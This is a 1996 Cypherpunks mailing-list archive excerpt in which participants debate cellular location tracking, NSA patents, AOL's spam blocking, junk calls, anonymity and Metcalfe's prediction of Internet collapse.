In-Reply-To: <01I96117UUVI9JDL62@mbcl.rutgers.edu>
Message-ID: <Pine.BSI.3.91.960907062148.22456E-100000@escape.com>
MIME-Version: 1.0
Content-Type: text/plain


I could have said this -- 

A few months ago, on the subway (the 4 train, if anyone gives a flying 
fig)  in Manhattan, I noticed the whole train was literally PLASTERED 
with copy after copy of the same sign -- a picture with a bullseye on a 
guys head who was speaking over a "stolen" cell phone.  Apparently they 
like to think they can say that all of the cell companies banded together 
to fight fraud. And I quote "It is now possible to track fraudulent calls...
so we can serve you better...mutual cooperation of ..."  and so on.

Cute.

There is no freedom left. You mark my words.  Look how much has been lost 
in the last year alone.

MILLIE'S PROJECTION:  By this time next year we will be in a totally 
FUTURE SHOCK "dystopia".   We're almost there.  Sign, in the subway, for 
the EMX card (a nice little credit card thing with your medical history 
on a chip) -- YOu just got in an accident. Quick, now answer 17 important 
questions about your health.

Geez, I'd rather mandate MedAlert bracelets.


This must end.


==Millie
sfuze@tiac.net

PS: for the record, I do not advocate diddly squat, am not a terrorist, 
and want the old things back.

On Fri, 6 Sep 1996, E. Allen Smith wrote:

> 	From comp.risks:
> 
> Date: Mon, 2 Sep 1996 22:24:13 -0400 (EDT)
> From: glassman@sunsite.unc.edu
> Subject: FedEx monitoring of cellular phonecall locations
> 
> [...] nowhere near either of those places, so I did not bother to mention my
> current location to the operator. The next day, Saturday, I called FedEx
> with the same cell phone from Blowing Rock to arrange the pickup. The
> operator immediately asked if I wanted them to come to the intersection that
> I had placed my call from the day before.
> 
> Two days later, a FedEx operator confirmed that they are getting "new
> systems" at some locations that are able to record the locations from which
> cellular calls are placed.
> 
> I have now asked Cellular One three times to explain to me why they do not
> tell subscribers that they pass this location information through the
> system, but to no avail. [...]
> 
> ========== end fwd.
> 
> 




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "<pstira@escape.com>" <pstira@escape.com>
Date: Sat, 7 Sep 1996 20:39:54 +0800
To: jim bell <jimbell@pacifier.com>
Subject: Re: Cellular phone tracing
In-Reply-To: <199609070057.RAA25948@mail.pacifier.com>
Message-ID: <Pine.BSI.3.91.960907062958.22456F-100000@escape.com>
MIME-Version: 1.0
Content-Type: text/plain



On Fri, 6 Sep 1996, jim bell wrote:

> You should DEFINITELY start worrying when the FexX operator says something 
> like, "I see you're the guy in the red shirt and brown pants."

I hope so, because red shirt and brown pants just DON'T go together.

-Millie, fashion diva
sfuze@tiac.net




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "<pstira@escape.com>" <pstira@escape.com>
Date: Sat, 7 Sep 1996 20:32:17 +0800
To: pgut001@cs.auckland.ac.nz
Subject: Re: What the NSA is patenting
In-Reply-To: <84207495027763@cs26.cs.auckland.ac.nz>
Message-ID: <Pine.BSI.3.91.960907063241.22456G-100000@escape.com>
MIME-Version: 1.0
Content-Type: text/plain



On Sat, 7 Sep 1996 pgut001@cs.auckland.ac.nz wrote:

> >United States Patent                   Patent Number:  5264794
> >                                       Date of Patent: 23 Nov 1993
> >
> >Method of measuring magnetic fields on magnetically recorded media using a
> >scanning tunneling microscope and magnetic probe

> techology isn't much different from what's publicly available), in this case
> all they were doing was protecting their investment (just like the various PKC
> patents originally assigned to universities).

I'm sure there's going to be a REALLY marketable device out of this to 
get royalties off of.

Don't be ridiculous. This is obviously a case of "my ass is protected 
more than yours so i can do anything *I* damn well please, but you are 
screwed."

Question: if we pay taxes, then we pay for the research. if we pay for 
the research, we should be able to see the results, just like 
shareholders in a company.

-Millie, future CIA capo^H^H^H^Hagent
sfuze@tiac.net




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Duncan Frissell <frissell@panix.com>
Date: Sun, 8 Sep 1996 00:00:58 +0800
To: wb8foz@nrk.com
Subject: Re: What is the EFF doing exactly?
Message-ID: <2.2.32.19960907112946.00afa290@panix.com>
MIME-Version: 1.0
Content-Type: text/plain


At 10:20 PM 9/6/96 -0400, David Lesher / hated by RBOC's in 5 states wrote:
>> 
>> So switch to Fedex.  The P.O. gives lousy service anyway.  Privitize.
>> 
>
>Try & mail an anonymous FedEx package.
>Try and pay cash in most Fedex offices.

Buy money order.  Slip it into the plastic pouch with the airbill.  Drop it
into collection box.  Works.

DCF





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Florian Lengyel <flengyel@dorsai.org>
Date: Sat, 7 Sep 1996 23:25:51 +0800
To: frogfarm@yakko.cs.wmich.edu
Subject: Re: Court challenge to AOL junk-mail blocks
In-Reply-To: <199609070316.XAA13685@yakko.cs.wmich.edu>
Message-ID: <32319F8B.53C3@dorsai.org>
MIME-Version: 1.0
Content-Type: text/plain


Damaged Justice wrote:
> 
> This is utter horseshit. AOL, like any private individual or organization,
> has the right to refuse service to anyone at any time for any reason, or
> even for no reason at all. 

That seems to undermine the analogy that the Internet is like an immense
electronic postal service, which suggests a more public than private
enterprise.

I take issue with the assumption that a carrier of the "internet postal
service" has the status of a "private individual or organization." I
think
that a corporation providing a mail delivery service might not be as
free as
a private individual is to set arbitrary limits on the services they
provide 
to their customers. Unlike the people who donate their time and
resources to the Internet out of goodwill, and who may set arbitrary
limits on the services 
they provide, in my experience, out of bad will, and who cannot be so
easily 
removed, a corporation's business can suffer if it doesn't provide
services.

One of the good things about the commercialization of the Internet is
that
you can fire those who, instead of providing a service, are busy
exercising arbitrary rights to refuse services unfairly or for no reason 
whatsoever.

If the Internet is supposed to be some sort of postal service, and the
ISP's are supposed to be akin to carriers, who don't regulate content,
then I think its wrong for them to regulate the content of the mail
service that they provide, even in the case of junkmail. (Of course
ISP's may impose various network controls that may have the effect of
restricting mass mailings without discriminating against content per se.
However, it is naive to assume that many network controls will not have
some effect on content, simply because of a logical distinction between
network control and editorial control - how many times have you heard 
various thinkers complain that the TV network soundbite isn't enough to
sustain critical commentary, etc?)

>The gubmint isn't doing SQUAT, except forcing
> AOL to allow the spammers access.

Since I reject the flat assumption that corporate ISP's have the same
freedom as private individuals to set limits on the internet services 
they provide  - in this case their freedom to act is limited by business 
constraints - it's fair to ask why it's morally OK for ISP's to censor 
junkmail, but if the government wants to step in, that's another 
matter entirely.

I'm not in favor of the government stepping in, but I am in favor of
some consequences of the commercialization of the internet. A bad
consequence is the increased volume of junkmail. A good consequence 
is the possibility of removing people who act as arbirary censors 
of other people's mail or speech, who invoke their rights as private 
individuals to regulate the services they provide for any reason 
whatsoever, while they hold their government to a higher standard 
of conduct, and even seek the protection of their government to 
act like petty dictators. 

> 
> --
> http://yakko.cs.wmich.edu/~frogfarm ...for the best in unapproved information
>       Hey, Bill Clinton: You suck, and those boys died! I hope you die!
>  I feel a groove comin' on             $              Freedom...yeah, right.
> 

F Lengyel	flengyel@dorsai.org	http://www.dorsai.org/~flengyel




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: jim bell <jimbell@pacifier.com>
Date: Sun, 8 Sep 1996 03:10:34 +0800
To: "Chris Adams" <cypherpunks@toad.com>
Subject: Re: What the NSA is patenting
Message-ID: <199609071627.JAA01473@mail.pacifier.com>
MIME-Version: 1.0
Content-Type: text/plain


At 12:18 AM 9/7/96 -0800, Adamsc wrote:
>On Fri, 06 Sep 1996 11:59:18 -0500, John Deters wrote:
>
>>I hope some hardware hacker who knows their low-level stuff will be able to
>>write a secure disk wiper.
>
>They have: it's called a bulk tape eraser. <g>
>
>
>I'd just store everything sensitive on a floppy. Those are easy to erase with a
>heavy duty magnet (not a wimpy refrigerator magnet).  I understand slagging one
>in the microwave is also effective <g>.

Just remember that an AC-driven bulk eraser will be far more effective than 
a permanent magnet at erasing data securely.  An oscillating magnet field 
re-magnetizes the floppy 120 times per second, as opposed to the single 
magnetization done by  the permanent magnet.  Each pass through the 
hysteresis curve brings down residual signals somewhat, maybe 10 db.  With 
the AC field, it's hard NOT to have a good erase.

Jim Bell
jimbell@pacifier.com




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: David Lesher <wb8foz@nrk.com>
Date: Sun, 8 Sep 1996 00:27:18 +0800
To: cypherpunks@toad.com (Cypherpunks)
Subject: Re: Junk Phone Calls, Metered Usage, and Cellphones
In-Reply-To: <ae55ca940302100440b2@[207.167.93.63]>
Message-ID: <199609071330.JAA03308@nrk.com>
MIME-Version: 1.0
Content-Type: text


Timothy C. May sez:
> 
> The downside is that calls _from_ or _to_ my phone during "business" hours
> are charged 42 cents a minute, airtime (tying up a channel and all), plus
> whatever other fees may be applicable at each end. Thus, every "junk call"
> I get trying to get me to buy aluminum siding, or to vote Democratic, or to
> switch my long-distance carrier (!), costs me a minimum of 42 cents,

The GSMish PCS carrier is winning points here with:

	No contacts to sign.
	1st minute of all incoming calls is free.

-- 
A host is a host from coast to coast.................wb8foz@nrk.com
& no one will talk to a host that's close........[v].(301) 56-LINUX
Unless the host (that isn't close).........................pob 1433
is busy, hung or dead....................................20915-1433




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: dlv@bwalk.dm.com (Dr.Dimitri Vulis KOTM)
Date: Sun, 8 Sep 1996 03:38:57 +0800
To: cypherpunks@toad.com
Subject: Re: "The Bill of Rights can be dangerous...."
In-Reply-To: <ae55a5aa010210049488@[207.167.93.63]>
Message-ID: <4X1VTD27w165w@bwalk.dm.com>
MIME-Version: 1.0
Content-Type: text/plain


tcmay@got.net (Timothy C. May) writes:
> As with Adam Back's mini-rant yesterday, this is exactly correct. In a free
> society, speech need not be approved, registered, escrowed, labelled, or
> identified with the Registered True Name of the speaker.

But the U.S. is not a "free society". Tim yaks at those who criticize
his beloved United States for not being "polite". Tim is wrong.

> "Books and magazines can be dangerous [bomb recipes, racial hatred,
> instilling bad values, etc.]-- as can restrictions on reading, especially
> in/by repressive regimes.  Therefore I would favor allowing unfettered
> reading -- with some form of traceability only under terms considerably
> stronger than what are generally required for a wiretap."
>
> (i.e., "book escrow," where one's reading materials are escrowed with
> Trusted Authorities, and only accessed by law enforcement under Proper
> Conditions. Failure to escrow reading materials would be a Class B felony.
> Cf. the FBI's Library Awareness Program of circa 1987-8.)

I remember beig surprised to discover that the library computer at City
University of New York (state school where I got all my degrees) had an
(easily accessible) record of every book I've ever checked out in some
15 years, And by the way you need to present A LOT of ids to take books
out of New York's public libraries, or to use the public-access
computers in them. And by the way you're asked to sign your name and
affiliation (fortunately, no ID is required) if you want to just enter
NYPL's Slavic division and use their reading room. Apparently this was
instituted during the cold war under the assumption that anyone
interested in Slavic Division's materials needs to be watched.

> "People moving around can be dangerous [avoiding parental responsibilities,
> avoiding taxes, spying, plotting to bomb buildings]-- as can traceability,
> especially in/by repressive regimes.  Therefore I would favor allowing
> freedom of movement -- with some form of traceability only under terms
> considerably stronger than what are generally required for a wiretap."
>
> (a la the "position escrow system" I predicted a couple of years ago would
> someday be seriously considered)

Have you tried to get on an airplane lately? I just had to present my
driver licence (work id w/ picture wouldn't cut it!) to get on. I
understand John Gilmore got himself arrested for refusing to identify
himself. As he said, there used to be a 200-year precedent that a
citizen can travel within the country without having to identify
himself. Shit, I used to fly under phoney names - can't do this anymore.

> A version for anonymous purchases and sales:
>
> "Anonymity in sales and purchases can be dangerous [bomb materials, stolen
> goods, unhealthful foods, etc.] -- as can traceability, especially in/by
> repressive regimes.  Therefore I would favor allowing anonymous purchases
> and sales of goods -- with some form of traceability only under terms
> considerably stronger than what are generally required for a wiretap."
>
> (There go the flea markets and garage sales (for buyers), which are largely
> anonymous. There goes walking into a store and paying cash for a piece of
> pipe (could be made into a bomb). There goes cash, period. See next item.)

A very good friend of mine does EE for a living, and in particular he
sells some EE equipment by mail order. He told me that every time he
sells something like the gizmo to write magnetic strips on credit cards,
he gets a phone call from los federales saying: you sold X who paid with
Y and shipped it to address Z - do you have any additional details? He
says every time they know as much about the sale as he does. :-)

> A version for cash:
>
> "Cash can be dangerous [illegal purchases, drugs, prostitution, tax
> evasion, illegal workers, extortion, etc.] -- as can traceable money,
> especially in/by repressive regimes.  Therefore I would favor allowing cash
> -- with some form of traceability only under terms considerably stronger
> than what are generally required for a wiretap."

That's why any time you attempt a cash transaction for over 10K (buying
a car, depositing it in a bank, etc), you will, by law, be reported to
the IRS, who will take a close look. I can't recall the name of the guy
who tried to take over 10K of cash out of the country without declaring
it, was searched, was caught, and is currently in jail.

> And so on. One can take Dyson's basic argument for why anonymity may be
> dangerous at times and why it may need to be restricted, limited, or
> banned, and use these arguments for a variety of other basic freedoms.
> Essentially, freedom can be dangerous. The world can be dangerous. In fact,
> it is.

As I told John Gilmore: I've known Esther Dyson for some time before she
got involved with EFF. I consider her a very nice person, and admire her
activities in Eastern Europe and elsewhere (and am in particular
thankful for her help on my past projects). I suspect that Esther simply
didn't think enough about this question before saying what she was
quoted as saying... I hope Esther will research the issue further, and
knowing her pro-liberty record, I'm sure she will see the value of
absoletely untraceable anonymity.

(Likewise I have great respect for Dr. Dorothy Denning, with whom I has
a very interesting conversation yesterday. She showed me cituations
where GAK (or generally employer access to keys) makes sense - not when
it's used by folks not affiliated with the government or the employer,
of course.)




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Damaged Justice <frogfarm@yakko.cs.wmich.edu>
Date: Sun, 8 Sep 1996 00:00:58 +0800
To: mccoy@communities.com (Jim McCoy)
Subject: Re: Court challenge to AOL junk-mail blocks
In-Reply-To: <v02140b03ae56d6064840@[205.162.51.35]>
Message-ID: <199609071337.JAA20307@yakko.cs.wmich.edu>
MIME-Version: 1.0
Content-Type: text


> > This is utter horseshit. AOL, like any private individual or organization,
> > has the right to refuse service to anyone at any time for any reason, or
> > even for no reason at all. The gubmint isn't doing SQUAT, except forcing
> > AOL to allow the spammers access.
> 
> AOL has a service agreement with their customers, and they are not allowed
> to change the rules just because they feel like it (I believe that this
> is called a contract :)  This is the jist of the injunction.

I've never looked at the AOL terms of service. I imagine they are rewriting
them even as we speak. If enough people get pissed that the contract was
changed, they'll leave. I'm sure most folks won't give a damn. It may set a
bad precedent, but somehow I doubt AOL is going to start changing their
contract whenever it suits them simply to piss off customers. What they're
doing now, they're doing in order to remain on good terms with the rest of
the net.

"Spamming" is often a subjective term: Like "porn", we know it when we see
it. Which makes it crucial that people make up their own minds about it,
without gubmint interference. Some ISP's will tolerate spammers, others
won't. The ones that do will face an uphill battle, and possible eventual
Usenet Death Penalty if the spam is thick enough.

--
http://yakko.cs.wmich.edu/~frogfarm ...for the best in unapproved information
why the dancing shouting   why the shrieks of pain  the lovely music  why the
smell of burning autumn leaves     working on the tiny blueprint of the angle
I must be silent must contain my secret smile  you my mirror you my iron bars





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: David Lesher <wb8foz@nrk.com>
Date: Sat, 7 Sep 1996 23:49:51 +0800
To: cypherpunks@toad.com (Cypherpunks)
Subject: Re: What is the EFF doing exactly?
In-Reply-To: <2.2.32.19960907112946.00afa290@panix.com>
Message-ID: <199609071340.JAA03365@nrk.com>
MIME-Version: 1.0
Content-Type: text


Duncan Frissell sez:
> 
> >Try and pay cash in most Fedex offices.
> 
> Buy money order.  Slip it into the plastic pouch with the airbill.  Drop it
> into collection box.  Works.

But then the cameras at the Post Office will get you...


-- 
A host is a host from coast to coast.................wb8foz@nrk.com
& no one will talk to a host that's close........[v].(301) 56-LINUX
Unless the host (that isn't close).........................pob 1433
is busy, hung or dead....................................20915-1433




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Brad Dolan <bdolan@use.usit.net>
Date: Sun, 8 Sep 1996 00:20:11 +0800
To: cypherpunks@toad.com
Subject: Re: Court challenge to AOL junk-mail blocks
In-Reply-To: <199609070433.VAA26061@adnetsol.adnetsol.com>
Message-ID: <Pine.SOL.3.91.960907094921.22093H-100000@use.usit.net>
MIME-Version: 1.0
Content-Type: text/plain


Anybody else have the cynical thought that the gubmint is trying to 
*encourage* us to beg for regulation?

bd


On Fri, 6 Sep 1996, Ross Wright wrote:

> On Or About:  6 Sep 96 at 23:16, Damaged Justice wrote:
> 
> > 
> > This is utter horseshit. AOL, like any private individual or organization,
> > has the right to refuse service to anyone at any time for any reason, or
> > even for no reason at all.
> 
> Sure. I agree with that, no shoes no shirt, if you are on AOL you 
> accept "internet-lite".
> 
> > The gubmint isn't doing SQUAT, except forcing
> > AOL to allow the spammers access.
> 
> Right now.  Yet it has been apparent to me that many people are 
> begging for restrictions to be put in place.  Restrictions on 
> spammers.  The government saying anything about regulation of the 
> internet is bad...  Yet people still scream about a couple of 
> unwanted e-mails.  I'm saying that this spammer thing could be the 
> "kink in our armour" that lets the government into our little 
> playground here.  Just suck it up and delete those messages.
> 
> Jog it off.
> 
> Ross
> 
> ===========
> Ross Wright
> King Media: Bulk Sales of Software Media and Duplication Services
> http://www.slip.net/~cdr/kingmedia
> Voice: 415-206-9906
> 




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Damaged Justice <frogfarm@yakko.cs.wmich.edu>
Date: Sun, 8 Sep 1996 00:23:09 +0800
To: flengyel@dorsai.org
Subject: Re: Court challenge to AOL junk-mail blocks
In-Reply-To: <32319F8B.53C3@dorsai.org>
Message-ID: <199609071350.JAA20470@yakko.cs.wmich.edu>
MIME-Version: 1.0
Content-Type: text


> > This is utter horseshit. AOL, like any private individual or organization,
> > has the right to refuse service to anyone at any time for any reason, or
> > even for no reason at all. 
> 
> That seems to undermine the analogy that the Internet is like an immense
> electronic postal service, which suggests a more public than private
> enterprise.

Perhaps that analogy held when the Internet was supported with money taken
at gunpoint from all us tax serfs. No more - you wanna play, you gotta pay.
Which is as it should be.

[snip]

 >Unlike the people who donate their time and
> resources to the Internet out of goodwill, and who may set arbitrary
> limits on the services 
> they provide, in my experience, out of bad will, and who cannot be so
> easily 
> removed, a corporation's business can suffer if it doesn't provide
> services.

If their business suffers because of a decision, they may reconsider that
decision. If they don't, they'll either survive, or they won't, depending
on if their customers will stand for it. I fail to see why charging money
for the services one provides suddenly transforms a person into a slave,
forced to provide service even if they do not wish to do so. Do you feel
that providing a service for free is more "noble", somehow, and therefore
more "worthy" of protection?

> One of the good things about the commercialization of the Internet is
> that
> you can fire those who, instead of providing a service, are busy
> exercising arbitrary rights to refuse services unfairly or for no reason 
> whatsoever.

Who is going to "fire" a company that provides a service? The gubmint is
your only alternative; the gun of the law, your only tool.

If you don't like your ISP, get a different one. Spammers do it all the
time. People are whining all over the place about "exercising arbitrary
rights", as if it were eeeeevil when companies do it. Get a grip. It's
called DISCRIMINATION, and it's not a bad word; it's just been corrupted
beyond belief by the PC mindset. When I discriminate, I am exercising my
taste, my judgment, in deciding who I wish to associate with; who I wish
to give my money to in exchange for services; who I trust, and who I do
not. If a company kicks a spammer off their system, what recourse do you
want them to have, other than their right to "vote with their feet" and
find a different provider? It seems you would find it favorable for them
to go whining to the gubmint: "Waaah! He kicked us out of his treehouse!
You go beat 'em up and make 'em take us back!"

If they can seize John Adams' yacht, they can seize your beat-up old car.
If they can force XYZ Corp to provide access, they can force anyone to
do anything, and there is no grounds for complaint. After all, universal
access must be provided! A chicken in every pot, and a router in every
garage! Right?

> >The gubmint isn't doing SQUAT, except forcing
> > AOL to allow the spammers access.
> 
> Since I reject the flat assumption that corporate ISP's have the same
> freedom as private individuals to set limits on the internet services 
> they provide  - in this case their freedom to act is limited by business 
> constraints - it's fair to ask why it's morally OK for ISP's to censor 
> junkmail, but if the government wants to step in, that's another 
> matter entirely.

Because only the gummint can "censor". Whatever anyone else does is NOT
censorship, unless you want to redefine words to suit your pleasure. It
is exercising judgment and taste. Whether you find that judgment acceptable
or not is not an excuse to impose your judgment on others at gunpoint.

> I'm not in favor of the government stepping in, but I am in favor of
> some consequences of the commercialization of the internet. A bad
> consequence is the increased volume of junkmail. A good consequence 
> is the possibility of removing people who act as arbirary censors 
> of other people's mail or speech, who invoke their rights as private 
> individuals to regulate the services they provide for any reason 
> whatsoever, while they hold their government to a higher standard 
> of conduct, and even seek the protection of their government to 
> act like petty dictators. 

Pot. Kettle. Black.

--
http://yakko.cs.wmich.edu/~frogfarm ...for the best in unapproved information
why the dancing shouting   why the shrieks of pain  the lovely music  why the
smell of burning autumn leaves     working on the tiny blueprint of the angle
I must be silent must contain my secret smile  you my mirror you my iron bars





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: dlv@bwalk.dm.com (Dr.Dimitri Vulis KOTM)
Date: Sun, 8 Sep 1996 02:57:10 +0800
To: cypherpunks@toad.com
Subject: Re: Junk Phone Calls, Metered Usage, and Cellphones
In-Reply-To: <ae55ca940302100440b2@[207.167.93.63]>
Message-ID: <Dy3VTD28w165w@bwalk.dm.com>
MIME-Version: 1.0
Content-Type: text/plain


tcmay@got.net (Timothy C. May) writes:
> The downside is that calls _from_ or _to_ my phone during "business" hours
> are charged 42 cents a minute, airtime (tying up a channel and all), plus
> whatever other fees may be applicable at each end. Thus, every "junk call"
> I get trying to get me to buy aluminum siding, or to vote Democratic, or to
> switch my long-distance carrier (!), costs me a minimum of 42 cents,
> depending on how fast I can realize who they are and get rid of them ("Let
> me forward you to Jim Bell's AP hotline...").

Wrong. It also costs your TIME. Junk e-mail takes TIME to recognize and
delete. TIME (even Tim's time) costs more than 42c.

> Needless to say, my cellular number is only going out to a handful of
> folks, and with recommendations that they not call me during business hours
> unless its urgent.

I had an interesting conversation with a New York Daily News telemarketer
a while ago. (Note that 1) I speak with a noteceable accent, 2) NYDN is a
left-wing tabloid, generally marketed toward blue-collar/minorities.)

RRing.
DLV: Hello?
NYDN: blah blah would you like to subscribe to New York Daily News?
DLV: No thank you, I don't read your newspaper.
NYDN: Well, you could at least look at the pictures <click>.
(Hung up on me before I did. :-)
A few minutes later:
RRing.
DLV: Hello?
NYDN: blah blah would you like to subscribe to New York Daily News?
DLV: Someone just called a few minutes ago and I said I wasn't interested.
 Please don't call this number anymore.
NYDN: I call every number in the exchange. We don't use a list for this.
 We don't do blocking.
(Fortunately, they haven't called me since.)

> These rates have really come down a lot. The unlimited calls is what sold me.

As you yourself point out, their charging you for each incoming call during
business hours is unacceptable. Why don't they bill the 42c / minute to
whomever is calling YOU, as they do with LD and 900 numbers?

---

Dr.Dimitri Vulis KOTM
Brighton Beach Boardwalk BBS, Forest Hills, N.Y.: +1-718-261-2013, 14.4Kbps




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: dlv@bwalk.dm.com (Dr.Dimitri Vulis KOTM)
Date: Sun, 8 Sep 1996 02:54:16 +0800
To: AwakenToMe@aol.com
Subject: Re: Court challenge to AOL junk-mail blocks
In-Reply-To: <960906233848_279253392@emout14.mail.aol.com>
Message-ID: <eN4VTD30w165w@bwalk.dm.com>
MIME-Version: 1.0
Content-Type: text/plain


AwakenToMe@aol.com writes:
> In a message dated 96-09-06 23:31:06 EDT, rwright@adnetsol.com (Ross Wright)
> writes:
>
> <<  Everyone on this list seems to want to limit
>  government  intervention EXCEPT when it comes to spam, then every
>  one just holds the door open wide and let them in.  If they get that
>  inch, they WILL take the whole 9 YARDS!!!!!!  Get a clue, delete or
>  killfile those who spam and keep the government out of
>  cyberspace!!!!!!
>   >>
> Tell me about it. Im on AOL. WHO CARESSSSSSS if ya get one MAYBE two pieces
> of  mail you take LESS than a second to delete them both with the handy
> delete key. These people are wasting more time complaining about it than they
> will ever do actually deleting it.

I don't use AOL and ask others not to use it because they practice censorship.
(A service where one gets a TOS warning for saying "I'm horny!" in a chatroom
desribed as "Gay&Lesbian Sex discussion" deserves to be boycotted.)

However AOL would probably please their customers if it allowed them to filter
their incoming e-mail according to user-specified rules. E.g., if you could
choose to tell AOL that any incoming e-mail matching certain criteria should
be dropped on the floor, at no cost to you, I'm sure a lot of AOL users would
be very grateful and would use this feature. Ditto for other providers.

---

Dr.Dimitri Vulis KOTM
Brighton Beach Boardwalk BBS, Forest Hills, N.Y.: +1-718-261-2013, 14.4Kbps




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Martin Minow <minow@apple.com>
Date: Mon, 9 Sep 1996 07:50:32 +0800
To: cypherpunks@toad.com
Subject: Imminent Death of the Internet, GIF at 11
Message-ID: <v03007802ae575f5ed09b@[17.219.103.73]>
MIME-Version: 1.0
Content-Type: text/plain


For several months (years?) Bob Metcalf has been predicting that
the Internet will self-destruct from overload. His argument
appears to follow one of Gordon Bell's maxims: "anyone can predict
the future: all you need is semi-log paper and a ruler." As I
understand it, Metcalf's argument is that network load (messages,
packets) is growing exponentially, while network bandwidth (fiber
capacity, switch performance) is growing linearly. At some point,
these two curves cross -- and demand will exceed capacity.

There are two solutions to this problem: either there will be
a fundamental change in the way messages move on the Internet
(i.e. they  don't all have to pass through Mae East and/or Mae West)
or there will be a fundamental change in the way we use the Internet.

We certainly are seeing changes in the way we use the network. When
I "got on the net" in the late 1970's, I was on two mailing lists
(SF-Lovers and Human Net) and could read *all* of Usenet traffic
in an hour or two. In the late 1980's, Usenet traffic totalled
about 10 MB/Day. Now, I'm on a handful of work-dependent, low
bandwidth mailing lists, one high-bandwidth, high noise mailing
list, almost never read Usenet and wouldn't dare attempt to support
a Usenet newsserver. Today, it takes longer for me to read mail on
an office Internet or 28.8 modem at home, than it did in 1980 on a
2400 baud modem.

To make a long story short, I suspect that we will be much more
selective in what we access on the net; we may hire editors (or
form communities that share "interesting stuff", each person
serving as one member of an informal editorial board). We will
also see organizations (companies or professional societies) funding
network-based publications to communicate matters of common interest.
(There are a number of these already, Risks Digest being possibly
the most important.)

So, in one sense, Metcalf is right; the Internet will self-destruct.
However, in another sense, he is wrong; the information carried
on the Internet will still be distributed, but probably in a
different form.

Martin Minow
minow@apple.com








From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Vipul Ved Prakash <vipul@pobox.com>
Date: Sat, 7 Sep 1996 18:35:31 +0800
To: gregburk@netcom.com (Greg Burk)
Subject: Re: Reputations
In-Reply-To: <543fs4fz39@netcom.com>
Message-ID: <199609071100.LAA00540@fountainhead.net>
MIME-Version: 1.0
Content-Type: text


Timothy C. May wrote:
>From daemon Fri Sep  6 17:08:18 1996
Date: Thu, 5 Sep 1996 10:27:34 -0700
X-Sender: tcmay@mail.got.net
Message-Id: <ae545aa807021004884d@[207.167.93.63]>
Mime-Version: 1.0
Content-Type: text/plain; charset="us-ascii"
To: cypherpunks@toad.com
From: tcmay@got.net (Timothy C. May)
Subject: Metcalf and Other Net.Fogies 
Sender: owner-cypherpunks@toad.com
Precedence: bulk
X-Status: 


I'm evolving a hunch that the problems we're seeing with "old fogies"
denouncing the Net, and anonymity, and "smut on the Net," are part of a
larger cultural issue. Namely, the familiar case of an older generation
complaining about the sloth and sin of the younger generations.

(Caveat: I'm 44, so I'm certainly a generation older than many of you, and
am about the same age, give or take a few years, of Dyson, Metcalfe, Kapor,
Denning, and the other Net.Doomsayers. However, 20-25 years ago, when I was
in college, I recall of course similar predictions of disaster. (And as it
turned out, the predictions that promiscuity would lead to a disaster
turned out to be partly correct, viz. AIDS.))

Robert Metcalfe, inventor of Ethernet and founder of 3COM, and how
publisher of "Infoworld" and sailing enthusiast, was interviewed on CNBC a
few minutes ago. He repeated his prediction of an "Internet collapse" in
1996, based on overuse, on bad pricing models, on lack of controls, and on
other concerns.

It could be that the Dennings, Dysons, Kapors, etc. of the world are simply
growing jaded with the Net and are projecting their own ennui in their
comments that the Net may need to be controlled. This may come with age, as
I'm sure the Kapor of 25 years ago would not have wanted President Nixon
and Attorney-General Mitchell telling him what he could read and write.

(In fairness, none of these folks listed have called for censorship. But
all have expressed "concerns" of one sort or another. Not that discussing
concerns is inappropriate--after all, we do it all the time. But I sense in
many of their phrasings of concerns a stereotypical "old fogeyness"
emerging.)

Just a thought. Maybe the solution to the EFF problem is to "not trust
anyone over 30."

--Tim May (untrustable since 1981)

We got computers, we're tapping phone lines, I know that that ain't allowed.
---------:---------:---------:---------:---------:---------:---------:----
Timothy C. May              | Crypto Anarchy: encryption, digital money,
tcmay@got.net  408-728-0152 | anonymous networks, digital pseudonyms, zero
W.A.S.T.E.: Corralitos, CA  | knowledge, reputations, information markets,
Higher Power: 2^1,257,787-1 | black markets, collapse of governments.
"National borders aren't even speed bumps on the information superhighway."






-- 

Vipul Ved Prakash                 | - Electronic Security & Crypto 
vipul@pobox.com 	          | - Internet & Intranets 
91 11 2247802                     | - Web Development & PERL 
198 Madhuban IP Extension         | - Linux & Open Systems 
Delhi, INDIA 110 092              | - (Networked) Multimedia





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Perry E. Metzger" <perry@piermont.com>
Date: Sun, 8 Sep 1996 01:41:36 +0800
To: mccoy@communities.com (Jim McCoy)
Subject: Re: Metcalf and Other Net.Fogies
In-Reply-To: <v02140b02ae56d0cc0dba@[205.162.51.35]>
Message-ID: <199609071517.LAA19170@jekyll.piermont.com>
MIME-Version: 1.0
Content-Type: text/plain



Jim McCoy writes:
> perry@piermont.com writes:
> > Alan Olsen writes:
> > > Metcalfe may have a valid prediction here.
> >
> > Metcalfe is talking out his ass. He's reached the "old geezer who's
> > impeding his own field" stage. Many of his articles seem to be written
> > as though no one was trying to fix problems.
> 
> Well, having talked with people involved with the problems I can assure you
> that they are real.

I'm "involved with the problems" too, you know. Don't teach granpaw to
suck eggs. OF COURSE there are problems. None of them, however, are
signs of "collapse".

As a certified Network Old Fogie, I can tell you about the time the
Arpanet decided to die because of a bug in the IMPs... and then there
was the day that the backhoe took out *the* line between the east and
west coasts... and then there was the time in the 80s before Van J's
algorithm where congestion was nuking everything in sight... and then
there was...

Look, there will *always* be trouble. The question is whether or not
"collapse" is something imminent. The answer is "no". Stuff will get
better, it will get worse, but the overall trend is better, and
collapse just isn't in the cards.

Metcalfe talks about stupidity like how there aren't enough "suits"
